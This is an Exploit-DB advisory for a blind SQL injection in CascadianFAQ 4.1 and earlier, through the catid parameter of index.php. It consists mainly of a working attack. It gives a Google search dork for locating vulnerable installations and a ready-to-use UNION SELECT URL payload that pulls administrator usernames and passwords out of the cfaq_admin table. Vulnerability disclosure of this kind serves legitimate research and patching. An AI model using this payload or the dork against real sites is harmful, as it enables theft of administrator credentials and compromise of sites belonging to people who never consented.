CascadianFAQ <= 4.1 index.php Remote SQL Injection Vulnerability

2007-01-30T00:00:00
ID EDB-ID:3227
Type exploitdb
Reporter ajann
Modified 2007-01-30T00:00:00

Description

CascadianFAQ <= 4.1 (index.php) Remote SQL Injection Vulnerability. CVE-2007-0631,CVE-2007-0663. Webapps exploit for php platform

                                        
                                            *******************************************************************************
# Title   :  CascadianFAQ &lt;= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://eclectic-designs.com
# $$      :  Free
# Dork    :  This FAQ is powered by CascadianFAQ
# DorkEx  :  http://www.google.com.tr/search?hl=tr&q=This+FAQ+is+powered+by+CascadianFAQ+&btnG=Google%27da+Ara&meta=

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?catid=[SQL]

Example:

//index.php?catid=-1%20union%20select%20concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-30]